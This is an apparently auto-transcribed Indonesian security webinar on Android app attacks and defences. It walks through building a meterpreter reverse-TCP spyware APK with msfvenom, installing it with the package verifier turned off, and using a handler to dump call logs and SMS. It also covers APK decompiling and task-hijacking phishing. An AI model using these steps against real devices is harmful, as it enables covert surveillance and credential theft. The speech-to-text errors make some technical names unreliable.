Tes. Assalamualaikum. Halo, Waalaikumsalam. Oke, kita mulai aja kali ya. Baik, Assalamualaikum warahmatullahi wabarakatuh. Perkenalkan, nama saya Rosma, panitia dari Tampil. Sebelumnya, saya ucapkan terima kasih banyak kepada Bapak Ibu yang telah hadir pada acara yang diselenggarakan oleh BISA AI berkolaborasi bersama Biro Bekasi. Sebelum acara dimulai, ada beberapa informasi yang ingin saya sampaikan terkait kegiatan yang diselenggarakan oleh Tampil. Tampil merupakan startup event community yang mengadakan berbagai event webinar di platform Tampil yang dapat diakses melalui aplikasi Android, iOS, dan web. Webinar terkait IT, AI, dan bidang lainnya setiap hari ada di Tampil. Jangan lupa untuk download aplikasi dan ikuti event, serta komen dan berikan reaksi di aplikasinya. Selain webinar, Bapak Ibu juga dapat mengikuti BISA AI lainnya seperti bootcamp, course akademi terkait AI, IT, dan lain melalui aplikasi BISA AI Academy yang dapat diakses melalui Android dan iOS. Selain itu, Bapak Ibu juga dapat mengikuti diskusi privat yang ada di aplikasi BISA AI Academy, di mana dapat berdiskusi langsung bersama materi yang ahli pada bidangnya, bisa dengan IT, AI, dan lainnya. Bisa juga berdiskusi mengenai riset maupun penyusunan tugas materi. Saat ini juga kami memiliki program unggulan seperti yang pertama ada masterclass dan on-job training backend program. Yang kedua ada masterclass dan on-job training front-end internship program. Dan yang ketiga ada masterclass dan on-job training data science internship program. Program internship tersebut dirancang untuk pemula yang ingin menguasai teknologi baik front-end, back-end, dan data science. Output dari program ini diharapkan semua peserta akan mendapatkan pekerjaan pada bidang tersebut. Program dirancang selama 1 bulan penuh, di mana 15 hari pertama terkait program, dan 15 hari berikutnya maupun partner BISA AI, serta bisa secara online jika lokasi di luar Jakarta atau Bandung. Pendaftaran program sampai dengan 25 Juli 2021 melalui aplikasi BISA AI Academy. Jika Bapak Ibu benar akan daftar dan sebelum tempat kehabisan karena hanya untuk 20 peserta. Nah, jangan lupa juga untuk follow sosial media Tampil, ada youtube.com/tampil, ada instagram.com/tampil, youtube.com/bisai, instagram.com/bisai, ataupun jika Bapak Ibu berminat akan gabung pada grup Telegram yang sudah tertera di public chat. Jangan lupa untuk berikan rating 5 dan komen positif pada Play Store Tampil dan BISA agar kegiatan rutin tetap berjalan. Terima kasih. Wassalamualaikum warahmatullahi wabarakatuh. Waalaikumsalam warahmatullahi wabarakatuh. Oke, Assalamualaikum warahmatullahi wabarakatuh, teman-teman. Selamat datang semuanya. Terima kasih sudah menyempatkan waktunya untuk mengikuti event ini di acara webinar kolaborasi di Lokasi dengan BISA AI di kelas pertama kali ini. Sebelumnya, perkenalkan, nama saya Ibnu dan saya adalah Public Relation dari Dilo Bekasi. Pengenalan sedikit mengenai Dilo Bekasi adalah Creative Camp yang diinisiasi oleh Telkom yang membentuk menumbuhkan bibit-bibit digitalpreneur di Indonesia. Salah satunya lewat program-programnya, yaitu meningkatkan baik itu meliputi dari segi hustler, hack, dan hipster. Nah, untuk teman-teman yang ingin tahu lebih lanjut mengenai Dilo Bekasi, silakan follow IG Dilo Bekasi, karena teman-teman bisa mengikuti event-event secara gratis di sana. Oke, teman-teman, dalam pembahasan kali ini, malam ini, kita akan membahas tentang scoring mobile application yang akan disampaikan oleh Mas Raffi Darmawan selaku praktisi security BISA AI. Untuk itu, saya ingin menginformasikan sekali lagi
Kalau kita akan dibagi, kegiatan ini akan dibagi menjadi 2 sesi, yaitu sesi penyampaian materi, kemudian dilanjutkan sesi tanya jawab. Mungkin langsung saja tanpa berlama-lama lagi dan memotong waktu, langsung saja Mas Raffi Darmawan, waktu dan tempat saya persilakan untuk penyampaian materinya. Terima kasih. Assalamualaikum warahmatullahi wabarakatuh. Tes suaranya udah kedengaran apa belum ya? Sudah, Mas? Sudah ya. Saya share screen ya. Boleh. Tuh Android developer itu suka gak nge-obfuscate gitu kan. Nah, tunggu deh. Untuk share screen-nya. Oh ini layarnya tiba-tiba ini share screen-nya tiba-tiba mati nih. Bentar ya, saya ulang lagi nih. Baik. Oke nih. Nah, sekarang udah terlihat lagi apa belum ya? Udah ya? Sudah, Mas. Oh, udah Sudah ya? terlihat. Nah, ini di sini contohnya ada APK gitu kan. Maksudnya ada tools dari Google Play Store gitu, di mana kita itu bisa nge-download APK gitu, APK yang ada di Play Store. Nah, ini kita add to Chrome aja gitu kan. Ini add extension aja gitu kan. Nah, ini tuh apa gitu kan. Nah, ini nama atau paket, misalnya kita mau cari APK yang kita download, misalnya apa ya, cari aja bisa AI aja deh gitu kan. Contohnya gitu kan. Cari Play Store misalnya gitu. Ini contoh yang lain gitu kan. Ini contohnya misalnya ini tinggal unduh aja gitu kan. Nah, ini udah langsung si aplikasi ini nih, dia langsung nge-generate gitu APK-nya kayak gimana. Ini di download gitu kan. Nah, ini di sini udah ke-download kan APK di sini. Tunggu dulu prosesnya sampai benar-benar selesai dulu. Oh ya, nanti kalau misalkan layarnya tiba-tiba hilang lagi, dibilang aja ya, dibilang aja kalau misalkan tiba-tiba hilang lagi. Baik, Mas. Nanti akan diinformasikan. Nah, ini saya lihat aja, ini tadi di sini udah ke-download ya, bisa AI Academy ini contohnya. Ini saya di download, terus tadi di sini ya. Ini sebenarnya APK itu cuma zip doang ya. Ini bisa, nah ini tinggal rubah aja ya APK jadi .zip gitu kan. Ini kan kelihatannya if you change name file name extension, the file might become unusable. Are you want to Are you sure want to change it? Nah ini yes saja gitu kan. Ini kelihatannya jadi kayak zip gitu ya, gitu kan. Nah ini open aja. Nah ini kelihatan kan di sini tuh. Di sini tuh APK itu sebenarnya cuma zip doang gitu kan. Jadi kalau misalkan sebagai Android developer itu jangan terlalu trust gitu kan. Nah ini bisa diberlakukan di APK lain juga gitu kan. Kalau misalkan ada yang mau coba ya silakan coba aja di aplikasi lain gitu kan. Sebenarnya intinya kalau Android itu kalau APK yang dari Play Store itu pasti bisa didapetin gitu. Kita bisa analisis juga gitu kan. Kayak gitu sih contohnya. Ini APK di compiling. Itu tadi baru ngebuka APK-nya doang. Nah, untuk di compiling ini contohnya Java di compiler APK misalnya. Ini saya rubah lagi ke .apk gini di sini. Terus di sini choose file aja gitu kan. Terus downloads ya di sini ya. Terus upload and decompile nih biar di mana si APK-nya itu di-compile lagi gitu kan.
Kalau misalnya mau coba ke APK lain silakan aja, silakan dicoba gitu. Intinya bisa gitu kan. Nah, untuk mencegah kayak gini sih sebenarnya untuk trik-trik kayak gini sebenarnya nggak bisa dicegah gitu ya. Intinya reverse engineering itu nggak bisa dicegah. Yang bisa dicegah itu cuma kita itu cuma bisa mempersulit proses reverse engineering gitu kan. Ini contohnya ada misalnya com. Terus misal gini. Jangan kayak gini jadi balik ke Java lagi nih. Contohnya seperti ini sih. Ini namanya proses decompiling. Nah, untuk APK decompiling itu tadi saya tulis aja the point siapa gitu kan. Sebenarnya adalah APK hanyalah file zip gitu kan. File zip, jadi isinya itu sebenarnya cuma zip doang. Kita tahu sendiri kan zip itu kita gampang buka gitu kan. Nah, untuk dapetinnya itu tadi untuk kita pakai APK combo nih di sini nih. Untuk mendapatkan APK dari place pakai APK combo gitu kan. Nah, terus untuk di compile-nya kita pakai yang namanya Java Decompilers gitu kan. Di compile-nya pakai ini gitu kan. javadecomplers.com. Nah, ini tuh Java Decompilers ini bisa nge-decompile selain Java, dia pakai APK juga gitu kan. Nah, ini buat nge-decompile si APK gitu kan. Yang pertama APK decompiling. Nah, untuk mencegahnya kayak gimana? Bukan mencegah sih, jadi bahasanya. Jadi mencegah itu nggak teknik kayak gini sih bisa dibilang nggak bisa dicegah juga gitu. Reverse engineering nggak bisa dicegah. Caranya itu minimalisir lah nah bahasanya gitu. Jadi intinya meminimalisir itu jadi kan ibaratnya gini nih, si attacker itu attacker itu udah tahu gitu, udah dapet source code-nya. Nah, pas udah dapet source code-nya gimana caranya biar si attacker itu susah mempelajarinya. Untuk minimalisirnya kita harus di obfuscate gitu. Nah, obfuscate maksudnya jadi kita itu harus nggak boleh misalkan APK yang langsung ke production itu aja nggak di obfuscate itu nggak ada pokoknya obfuscate itu intinya kayak gini gampangnya. Misalkan ada suatu variabel di source code-nya, misalnya nama variabelnya itu data misalnya, ada variabel namanya sendata. Nah di obfuscate itu nanti sama obfuscator itu variabel itu misalkan di random misalnya jadi ABCD. Dengan kayak gitu tuh si attacker itu kalau misalnya mau baca itu dia bakal mikir ulang gitu. Dia tuh bakal harus perlu buat mahamin lagi gitu kan. Itu APK decompiling nih. Nah, yang kedua ini sebenarnya nih yang tadi juga nih. Ini ada ini di sini nih. Nah, yang pertama-tama adalah yang lain nih. Jadi ada suatu aplikasi nih. Kalian kalau misalkan mau nge-install aplikasi itu sebenarnya harus hati-hati banget nih. Ini jadi ada suatu exploit gitu kan dari Stanhope gitu kan. Nah, ini new Android vulnerability. Nah, ini kan. Jadi intinya itu adalah misalkan kalian ini bikin suatu aplikasi nih ya. Bikin suatu aplikasi namanya aplikasi X gitulah. Nah, setelah kalian bikin aplikasi X itu, dan
kalian rilis di production. Production itu maksudnya di-upload ke Play Store kan. Nah, terus setelah itu user kita tuh user si aplikasi X itu dia itu asal download aplikasi. Anggap aja ibaratnya gini, misalkan kita itu yang resminya itu WhatsApp, terus ada pengguna WhatsApp yang namanya pakai WhatsApp Mode. Nah, kayak gitu tuh gampangnya gitu kan. Nah, WhatsApp Mode itu nggak resmi kan. Nah, jadi pas nge-install gitu kan, dia itu bakal minta permission banyak banget gitu kan. Misalnya allow send and view message gitu kan. Terus nanti pas misalnya si user itu nge-okein, dia itu bakal ngirimin data gitu. Misalnya si aplikasi ini bisa ngelihat data gitu kan. Ini kayak gini nih. Jadi apa sih? Jadi contoh macam-macam serangannya itu sebenarnya ini jatuhnya ke phishing sih ya. Aplikasi meminta banyak aplikasi. Nah, untuk aplikasi yang meminta banyak permission ini, saya bakal contohin aja sih ya di sini ya. Ini saya punya Kali Linux di sini. Ini saya punya Kali Linux di sini kelihatan ya di sini ya. Terus saya di sini ceritanya saya di sini ada Android emulator ya di sini ya. Android emulatornya itu dia itu bisa nyambung ke Kali Linux-nya gitu kan. Oke, di sini. Terus yang bakal saya lakuin adalah di sini saya mau bikin suatu APK gitu kan. Di mana APK-nya itu kalau misalkan diinstal sama user itu, dia itu bisa nyolong data user gitu kan. Jadi kalian tahu kan istilahnya nyadap gitu, nyadap orang. Nah, itu kita bisa pakai nyadap orang tuh cuma lewat APK doang gitu kan. Ini saya pengen ke Firewall HTML aja biar bisa diakses dari luar. Ini yang Kali Linux saya nih. Terus di sini saya mau pakai yang namanya Metasploit gitu kan. Nah, di Metasploit itu ada suatu fitur gitu, pokoknya namanya MSF Venom gitu kan. Nah, ini banyak banget bermacam-macam payload gitu kan. Nah, ini kita lihat aja di payloads gitu kan. MSF Venom, strip, milis, payload gitu kan. Ini kalau misalkan buka MSF Venom kadang suka lama sih, coba. Coba ini agak tunggu dulu gitu kan. Kita mau lihat sih apa aja sih pilotnya gitu kan. Nah, yang jelas itu nanti hasilnya itu dia bakal ada ini yang namanya Android Metadata gitu kan. Ini lihat ya, ini pilot Windows, terus di atas itu ada, nah ini ada OS X gitu kan. OS X itu bukan, ini ada Linux, ini banyak banget tuh kan. Nah, ini ada Android Metadata gitu kan. Nah, ini saya bakal jelasin juga dikit sih Android Metadata. Jadi Metadata itu apa sih, yang kalau yang belum pada tahu gitu kan. Metadata itu adalah semacam kayak tools di exploit itu, tujuan kita itu bisa ngendaliin target terjauh gitu kan. Nah, ini ada berbagai macam nih, ada reverse HTTP, maksudnya reverse HTTP, dia itu bakal channel communication-nya ngirim datanya lewat HTTP gitu kan. Nah, ini kalau misalnya ngejelasin tunneling itu buat apa, ini bakal panjang banget. Intinya tunneling itu dia itu untuk ngehindarin yang namanya misalnya kayak firewall, misalnya ada firewall, nah itu kita pakai tunneling gitu kan. Nah, ini reverse HTTPS, iya di sini ini tujuannya supaya ketahuan gitu kan. Ada reverse TCP. Reverse TCP ini bebas ini ya. Maksudnya portnya bebas. Kalau yang sebelumnya port 80, terus HTTPS itu port 443 ya. Nah, ini tuh ada tulisan, ada yang namanya stage gitu kan.
ada yang namanya stage payload, ada yang namanya non-stage payload. Kalau stage payload itu dia itu ngirim datanya itu dia bertahap gitu kan, satu-satu gitu. Tapi kalau misalkan non-stage itu dia itu ngirim datanya itu langsung sekaligus gitu. Nah ini saya coba aja ya di sini ya. Ini di sini ini ke firewall HTML lagi aja. Terus di sini yang selanjutnya itu kita harus tahu IP kita dulu nih. Nah, ini kita pakai ETH0 ya di sini. ETH0 kalau tab 0 itu artinya VPN sini di sini ya. Nah, sebelumnya itu coba kita cek dulu kita bisa nggak sih nggak akses Kali Linux-nya dari Windows kita nih. Kita pakai sudo dulu nih, sudo service apache2 start gitu kan. Ini tujuannya untuk ceritanya saya mau ngirimin APK-nya itu supaya ceritanya skenario-nya adalah si target itu ngedownload APK-nya melalui website gitu kan. Terus ini saya coba nih, tadi IP-nya 192, terus 108.80.128. 168.80.128. Ya. Nah ini bisa ya, bisa diakses ya. Di sini ini berarti Kali Linux-nya bisa diakses dari sini. Nah sekarang gimana caranya? Ini saya msvenom min p. Terus setelah itu kita pakai Android Interpreter ya, reverse TCP di sini. Terus L host-nya itu kita set jadi 192.168.880.128. Terus L port-nya itu adalah kita bebas saja, kita pakai port yang umum aja, misalnya 443 gitu kan. Terus min F-nya itu APK, min F itu output tipe file outputnya, terus min O itu artinya outputnya kita mau misalnya min O-nya itu apa sih? Misalnya meter.apk gitu ya. Ini kita enter aja gitu kan. Kita tunggu dulu bentar. Ini ada salah ya, bentar. Oh, berarti nggak pakai min F. Harusnya bisa sih, pakai min O doang. Nah ini coba kita lihat. Nah ini udah ada suatu payload nih, udah ada APK nih, kebentuk APK. Coba kita cek dulu benar APK atau belum sih. Method.apk. Nah ini zip archive. Zip archive itu tadi udah saya jelasin APK itu adalah file zip gitu kan. Nah sekarang itu ceritanya saya mau download APK-nya gitu kan. APK-nya itu ceritanya dipaksa dibuat diinstal di sini aja nih, di emulator ya. Nah tadi apa sih meter APK gitu kan. Nah ini udah, nah ini di sini akan WinVS sebentar nih. Coba download lagi ya. Nah ini udah berhasil download. Terus di sini saya mau nge-install di Android-nya ya. Android-nya itu Samsung S9. Jadi saya mau pasang ya. Nah ini karena kita pakai Android emulator, pertama-tama itu saya mau pasang dulu nih.
ke Genymotion ya. Coba si Genymotion itu lokasi di mana sih? Open file location ya. Saya mau nyari tahu si Genymotion itu di mana. Ini tadi di sini Genymotion terus tools ya. Jadi installnya itu kita pakai ADB gitu kan. Ini tadi lokasinya itu di program misal, jadi berarti cd c program files, terus Geny mobile, terus Geny motion, shift tools gitu kan. Ini kita dir, ternyata udah ada ya ADB gitu kan. Nah, jadi cara nge-installnya gimana sih? Kita pakai ADB install. Nah, ini matter.apk-nya itu kita harus cari tahu dulu lokasi di mana, show in folders ya. Ini ada di users Lenovo downloads gitu kan. Kita pakai ADB install. Terus kita kasih lokasinya C users Lenovo downloads matter.apk ini. Install verification failure. Tapi biasa harusnya bisa sih ini. Coba langsung install aja di kita buka browser aja. Ada apa nggak ya ini? Kita buka IP-nya 192.168.180.128 coba ya. Nah, ini terus meter.apk coba di sini. Ini udah selesai download apa belum ya? Ini cuma coba cari Chrome. Ada nggak ya Chrome di sini? Coba dipasang Play Store, dipasang Play Store dulu kali ya, atau enggak DB install. Nah, ini file to install, install file. Coba dicari dulu ini kenapa harusnya biasanya bisa sih ini. DB install terus install file verification failure. Oh, harus ini pages verifier-nya dimatiin ya di sini. Coba di sini di set dulu coba. Nah, ini soalnya udah sukses berarti ya. Ternyata salah di ini pages verifier-nya terus dimatiin dulu gitu kan. Nah, ini ada suatu pilot, suatu program ini namanya main activity nah, di sini. Nah, ini kalau misalkan kita install seperti biasa gitu, seperti misalnya kita installnya manual nggak pakai ADB gitu kan, kita tuh bakal diminta banget banyak permission ya.
bakal diminta banyak bakal diminta banyak permission, misalnya diminta SMS, harus si aplikasi harus bisa akses SMS, terus harus bisa akses foto dan lain-lain. Nah, ini kita pakai, nah untuk mulainya langsung aja kita pakai MSF Console ya. Console Minty gitu kan. Kita pakai sudo supaya si MSF itu jalan sebagai root gitu kan. Biar bisa listening port ke 443. Nah, ini kita pakai use exploit multi handler nih. Nah, ini kita options-nya apa aja sih gitu kan. Untuk lhost-nya ini karena kita untuk listening mode, kita lhost-nya kita atur jadi 00 aja. Untuk L-port-nya itu kita atur jadi 443 ya. Tadi di sini kita atur 443. Ya, salah nih. Set L-port 443, terus habis itu setelah itu kita set payload-nya. Payload-nya itu biasanya adalah generic cell reverse TCP, ini kita rubah jadi ke yang tadi nih. Nah, terus kita run aja exploit gitu. Nah, ini udah listening mode si Metacrater-nya ini. Coba kita jalanin aja nih di sini. Kelihatannya nggak ada apa-apa, tapi sebenarnya dia itu ngirimin suatu koneksi ke Kali Linux ini. Nah, ini kita help aja, kita bisa ngapain aja sih gitu kan. Nah, ini tuh bisa bahaya banget ya. Kita bisa install aplikasi bebas saja, kita bisa nge-run aplikasi bebas saja gitu kan. Terus dia bisa melihat webcam gitu kan. Coba di sini saya screenshot, coba kita screenshot gitu kan. Mas screenshot with Android. Tunggu yang ada. Coba dicek dulu aja. If config ya. Kalau misalnya IP config, coba di-hub lagi ya di sini. Kita bisa pakai dump kalau gitu. Dump call log gitu. Nah, ini kalau misalkan sebenarnya ada data kayak panggilan gitu kan, dia itu bakal bisa ngebuka gitu panggilan. Coba di sini coba manggil aja ya, misalnya ini nomor saya nih, atau nomor ngasal aja 08552 misalnya ngasal aja lah. Nah, ini coba telepon ya di sini ya. Terus sedangkan di sini kita coba ini, kalau ini dimatiin dulu deh. Di sini ada, nah ini ada data panggilannya. Coba sekarang nah ini ada tulisannya kolokdam kan nih di sini. Coba nih dilihat ya. Di sini ada kolokdam 2020. Nah, ini tadi saya buka, gantung nih, buka Metasploit-nya di mana nih? Coba nih saya lihat nih cat. Nah, ini kelihatan kan nih di sini dari APK yang permission yang nggak benar nih bisa kelihatan nih. Ini misalnya kita manggil ke nomor ini. Terus bisa kelihatan durasinya apa, ini outgoing berarti kita yang manggil gitu kan. Terus tanggalnya kapan. Nanti kalau misalkan ada kontaknya ini nama kelihatan gitu kan. Atau enggak kita coba aja misalnya SMS. Coba, harusnya bisa. Bisa juga sih dia simulasi SMS. Message dengan, nah ini messaging, coba. Coba ini 08, coba 08, tadi yang nomor dummy aja tuh. Coba ya. Ini misalnya
asal aja deh kirimnya. Ini adalah Tan Asia. Jangan misalnya jangan bilang siapa ya gitu kan. Ini ceritanya OTP. Kode Anda adalah 123456. Nah, ini coba desain aja coba ya. Halo, ya. Oh, masih kelihatan ya? Saya kira udah nggak kelihatan, Bang. Nah, ini kita lihat dulu nih. Coba kita dump SMS gitu kan. Nah, ini kelihatan nih SMS-nya, kita bisa melihat SMS-nya apa gitu kan. Nah, ini kelihatan message-nya, ini adalah pesan rahasia, jangan bilang siapa-siapa ya, kode Anda adalah segini-segini gitu kan. Nah, ini bisa dibilang bahaya banget, dan kalau misalnya ada yang mau ekspor, ini banyak banget. Kita bisa tahu lokasi si korbannya di mana gitu kan. Kita bisa kirim SMS juga, bahkan bisa kirim SMS sebagai si korban tadi, kita bisa juga, terus install juga, terus kita bisa nyalain webcam diam-diam, kita bisa nge-record juga, banyak banget sih di sini tuh. Ini tuh tadi ini tuh sebabnya kenapa sih aplikasi meminta banyak permission. Jadi ceritanya itu yang udah saya contohin tadi nih, yaitu kalau pas mau install itu bakal minta banyak permission banget gitu kan. Nah, tadi karena saya di emulator gitu kan, karena saya install di emulator, jadi ya langsung aja gitu kan. Tapi kalau misalnya ada yang mau nyobain tuh install manual, pasti bakal minta banyak banget permissionnya. Nah, mungkin itu sih. Nah, ini untuk mencegahnya kayak gimana sih? Ini mencegahnya kita as a user sih. Kalau untuk as a user itu mencegah dengan cara apa ya namanya, teliti permission yang diminta gitu kan. Jadi ya kalau APK ya jangan asal install aja, tapi kita nggak tahu terus permission ada apa. Oh ya udah low aja, sebenarnya itu bisa bahaya gitu kan. Nah, ini yang itu ini saya bahas juga nih. Ini jadi kurang lebih tadi bahas offense mode sama ini defense mode-nya. Nah, ini untuk yang terakhir itu saya bahas tentang ini nih yang exploit yang bisa dibilang masih baru sih kalau saya pelajarin ini dari Stanhope gitu kan. Jadi dia itu pertama-tama kayak gini nih. Nih saya jelasin. Pertama-tama itu misalkan si itu company itu membuat suatu aplikasinya itu anggap aja XYZ gitu kan. Terus si user gitu ya, lagi-lagi user lagi gitu kan, usernya bermasalah terus gitu kan. Ini bakal bahas, ini kurang lebih bahas di usernya sih. Yang tadi yang bahas di Android di sini aja nih APK di compiling. Nah, lagi-lagi si user ini dia itu nge-install APK gitu kan, nge-install APK yang dari luar gitu kan. Sebenarnya APK-nya itu dia nggak minta permission banyak gitu kan. Cuma gitu si APK-nya itu pas pas itu jadi si APK-nya itu kan ceritanya ada dua aplikasi ya. Skenario-nya ada dua aplikasi. Pertama aplikasi yang asli, yang kedua aplikasi yang palsu gitu kan. Nah, untuk aplikasi yang palsu ini pertama-tama itu si victim itu, si target itu dia ngeklik dulu aplikasi yang palsu gitu kan. Setelah itu andai saja si user itu dia itu ngebuka aplikasi yang asli gitu kan. Nah, nah ini kelihatannya gambarnya yang harusnya itu kebuka aplikasi yang asli, tapi dia itu bakal kebuka ini malicious login page and which is ini tuh phishing gitu kan. Kenapa sih? Nah, si phishing-nya itu bakal bertindak seolah-olah ini tuh dari Facebook beneran kan, ini ceritanya Facebook ya. Bakal
bakal bertindak seolah dari Facebook beneran. Itu dibuat semirip persis gitu halaman loginnya. Padahal bukan Facebook gitu kan. Nah, nanti pas dimasukin username password-nya, seolah-olah nggak terjadi apa-apa. Ini bakal buka aplikasi yang asli. Dan yang bahayanya itu adalah si data si victim ini bakal kekirim ke ini nih, ke attacker ini kan. Nah, di sini namanya Stanhope vulnerability ya di sini ya. Nah, ini jadi sebenarnya tadi nih yang ketiga adalah Stanhope exploit sini. Sebenarnya Stanhope exploit. Nah, ini terus exploitnya kayak gimana nih namanya itu adalah kalau nama tekniknya itu adalah Android Task Injection gitu kan. Nah, di sini ya. Nah, ini sebenarnya kenapa sih? Ini sebenarnya kita tuh untuk exploit ini salahnya di mana? Pertama itu kesalahan user dan yang kedua itu adalah kesalahan Android developer juga gitu kan. Nah, untuk kesalahan usernya kenapa sih kesalahan usernya itu adalah install aplikasi sembarangan gitu kan. Itu pertama kesalahan usernya. Yang kedua itu adalah gimana cara aplikasi ini bekerja, dia itu nge-overload si ini main activity-nya itu. Jadi kan ada di Android Manifest itu ada Android Task Affinity gitu kan. Nah, ini ditargetin jadi prosesnya si user gitu kan. Prosesnya si aplikasi. Misalkan nama prosesnya gini nih. Misalkan nama prosesnya itu adalah com.xyz terus apa lagi ya? com.xyz terus aplikasiku gitu kan. Nah, nanti si attacker itu dia itu bisa pakai exploit ini nih. Nah, ini nanti kan ini di contohnya si exploit ini adalah tadi kayak ini ya. Nah, terus ganti sama dia gitu kan. Jadi kayak gini gitu kan. Nah, setelah jadi kayak gini sama dia di compile gitu kan si Android-nya itu. Setelah di compile dikasih ke si victim dan si aplikasinya itu bakal mirip persis gitu pas dibuka itu kayak halaman login yang asli gitu kan. Padahal sebenarnya ngirim ke halaman yang palsu gitu kan. Seperti di contohnya di sini nih, di sini ya. Nah, untuk mencegahnya apa sih gitu kan? Mencegahnya untuk pertama-tama itu kita harus ngelihat sisi user dan juga sisi user habis itu setelah itu sisi Android itu kita sebagai programmernya. Untuk sisi usernya jangan menginstal aplikasi sembarangan gitu kan. Yang kedua itu sisi Android-nya itu sisi programmer. Sebenarnya ada patch-nya untuk mencegah ini exploit ini, di mana kita itu nggak boleh, di mana sih di Android Task Affinity-nya itu didefinisiin supaya nggak boleh di overload gitu kan. Kalau nggak salah nih ada deh. Android Task Hijacking Prevention coba ada sih. Maka saya udah dapat juga kan cara mencegahnya dan ada tulisan dari Flutter sih. Itu udah dapat dari Flutter sih cara prevensinya Android Task Injection Android Task Hijacking GitHub terus coba Flutter ya coba. Nah ini nih cara mencegahnya nih. Nah ini tadi, nah ini apa sih gitu kan? Ini steps, ini use case-nya gitu kan. Nah ini di mana ada suatu aplikasi dia itu nambahin task affinity-nya si ngarahin ke ini Flutter app-nya dia. Tab to reproduce ini kelihatan ya. Create blank Android project in Android manifest.xml terus add-nya itu tadi yang saya contohin ditargetin ke prosesnya target kita nih. Terus
buka aplikasi yang asli, ini example my Flutter app ini yang asli gitu kan. Terus abis itu run Android app, ini maksudnya itu run aplikasi yang palsunya. Terus close it itu maksudnya itu adalah di close yang Android yang asli itu di close, setelah itu buka lagi gitu kan. Nah, yang bakal ini kelihatannya expected resultnya itu apa? Flutter application, terus actualnya itu adalah dia itu bakal ngebuka aplikasi yang palsu gitu. Nah, untuk proposalnya itu maksudnya dia coba di automatically add nih. Jadi tujuannya itu biar supaya nggak bisa di overload gitu kan. Jadi kita itu bikin di Android manifesto XML itu harus didefinisikan duluan gitu kan. Jadi biar nggak diganti sama orang gitu kan. Nah, ini saya kasih aja nih. Nanti untuk materinya bakal saya share juga. Ini kurang lebih begitu ya. Untuk macam-macam serangannya saya simpulin lagi. Yang pertama itu adalah APK di compiling. APK di compiling itu kenapa gitu kan? APK itu hanya file zip gitu kan. Kita bisa dapetin APK dari Play Store dengan mudah gitu kan. Kita bisa ada tools, contohnya APK combo, terus nggak di-compile pakai Java di compilers. Kita bisa, setelah dapat shortcut yang asli, kita bisa analisa kan. Jadi kayak gimana gitu kan. Terus yang kedua itu, Android meminta banyak permission. Nah, ini contohnya itu tadi offense-nya itu pakai metasploit gitu kan. Tadi kelihatan juga nih data-data kita kelihatan semua gitu kan. Kita ini SMS kelihatan, terus panggilan kelihatan gitu kan. Terus yang Sandhawk exploit contohnya, yang Sandhawk exploit itu dia bisa overload jadi si Sandhawk exploit itu pas ngebuka aplikasi asli tapi kebuka aplikasi phishing, dan setelah masukin si korban itu masukin kredensial, si aplikasi phishing itu bakal nutup terus ngebuka aplikasi yang aslinya gitu kan. Kurang lebih begitu ya untuk offense mode dan defensive mode-nya itu. Mungkin ini sekarang masuk ke sesi pertanyaan ya, nggak berasa juga udah sejam sini. Kalau yang mau nanya silakan tuh. Oke, terima kasih atas pemaparan materinya Mas Raffi. Kali ini kita akan kita berikan waktu durasi sekitar 10 menit. Bagi teman-teman yang ingin bertanya, boleh langsung di kolom komentar. Sudah masuk juga beberapa pertanyaan, Mas, di antaranya dari Mas Viko Ditama. Kak, saya berikan suatu dan application dan lain-lain itu mengungkapnya tidak bos. Nah, bagusnya Mas kasus Ini sebenarnya putus-putus ya dari Mas Ibnu ya. Putus-putus atau dari saya dong ya? Kalau untuk Mas Viko, saya jawab aja, ini ada APK Notes bawaan dari suatu smartphone. Kalau misalkan bawaan itu berarti kalau udah resmi sih harusnya nggak masalah sih. Kalau yang masalah itu kalau misalkan kita itu nge-installnya itu dari bukan resmi itu, terus dia itu minta permission banyak banget, dan itu bakal bahaya gitu. Kalau lebih begitu sih, kalau resmi sih nggak masalah harusnya. Untuk dari Pak Diwandaro ya, permission yang nggak wajar untuk sebuah aplikasi apa aja sih yang nggak wajar? Putus-putus Mas. Untuk dari Pak Diwandaro itu, kalau list permission yang nggak wajar itu, kita lihat pertama-tama tuh kita lihat ininya aja nih. Misalkan suatu APK itu kita lihat dulu nih fungsinya ngapain nih kan.
misalkan kalau APK-nya itu fungsinya simple, gitu, misalnya cuma anggap aja misalnya kita dapat APK dari internet gitu. APK-nya itu cuma main game doang, misalnya cuma main game catur doang kan. Misalnya main game catur atau main game apa gitu kan. Nah, tapi pas mau install itu permissionnya aneh banget. Misalnya dia itu minta akses kontak, minta akses SMS, minta akses foto, minta akses dan lain-lain, itu minta akses lengkap banget itu. Nah, itu bisa dibilang itu nggak wajar, itu aneh gitu kan. Nah, itu yang harus diwaspadai itu kan. Eh, Perbedaan phishing dan MIT proxy. Kalau phishing itu, kalau misalnya MIT proxy itu kalau kurang kurang lebih ya. Kalau main in the middle itu, halo ya Mas Ibnu, ini masih putus-putus Ya, ya? halo. Masih putus-putus ya, Mas? Ini masih putus-putus Mas. Oke. Tadi udah sampai pertanyaan yang mana ya, Mas? Tadi dari Pak Diwandaro Oh, sampai sudah dijawab berarti ya? sudah dijawab. Ke Pak Hanung Pangestu Rahman. Assalamualaikum warahmatullahi wabarakatuh. Waalaikumsalam. Selamat malam. Izin bertanya, saya sedikit tahu tentang bagaimana cara mengambil endpoint dan parameter sebuah API aplikasi. Semisal menggunakan Burp Suite, menurut saya itu sangat kritikal. Tapi ada beberapa aplikasi yang ketika kita baca traffic HTTP tersebut tidak terbaca dan tidak bisa terbuka. Pertanyaannya bagaimana cara membuat aplikasi tidak bisa dibaca traffic HTTP-nya? Terima kasih. Oh iya, ini untuk masalah HTTP tadi ketinggalan tadi ya. Ini ada satu lagi nih. Berarti nih tambah nih SSL pinning itu. Jadi sebenarnya apa sih gitu kan? Pertama-tama ini kasus yang dari Mas Hanung ini adalah jadi bisa dilihat nih aplikasi yang dia itu nggak implement SSL pinning sama nggak implement SSL pinning sama implement SSL pinning. Contohnya kalau misalnya nih Mas Hanung coba intercept aja itu bisa aplikasi Instagram ya atau nggak Instagram atau nggak Facebook gitu kan, coba dipasang bullshit aja, mungkin itu kayaknya nggak dapat gitu kan, kayaknya nggak dapat, kayaknya susah gitu kan dapetnya. Nah itu karena mereka itu ada SSL pinning, dan juga saya udah pernah nyoba juga nggak intersepsi bullshit gitu. Dia itu ada SSL pinningnya, jadi kita itu harus ngakalin caranya dulu, gimana caranya buat nge-bypassnya. Nah buat cara nge-bypassnya itu saya baca-baca itu tuh harus kita ngebongkar APK-nya dulu, APK-nya di otak-atik dulu baru bisa gitu kan. Nah, untuk kembali lagi ke pertanyaannya, gimana caranya aplikasi kita 